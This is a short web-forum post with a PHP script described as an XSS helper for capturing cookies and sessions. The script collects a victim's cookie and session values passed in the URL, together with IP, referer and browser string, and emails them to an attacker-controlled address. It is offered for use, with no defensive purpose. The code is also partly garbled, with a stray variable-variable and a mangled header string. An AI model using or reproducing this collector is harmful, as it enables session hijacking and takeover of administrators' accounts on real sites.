xss配合php获取cookie和session的脚本
- PHP中文网オリジナル
- 2016-05-25 17:09:581889ブラウズ
1. [代码][PHP]代码
<?php $ip = $_SERVER['REMOTE_ADDR']; $to='xxx@yeah.net'; $referer = $_SERVER['HTTP_REFERER']; $cookie = $_GET['cookie']; $session = $_GET['session']; $agent = $_SERVER['HTTP_USER_AGENT']; $subject='远程XSS获取地址-域名:'.$referer; $body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date('d-m-Y'). "<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie."<p> Session信息=".$$session.' '. $headers= 'MIME-Version: 1.0' . "\r\n"; $headers.= 'Content-type: text/html; charset=utf-8' . "\r\n"; $headers.="Cleanreport.com"; mail($to, $subject, $body, $headers); ?>
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
前の記事:360通用防护 过滤用户输入的数据,实现防注次の記事:php版 筛选需要的文件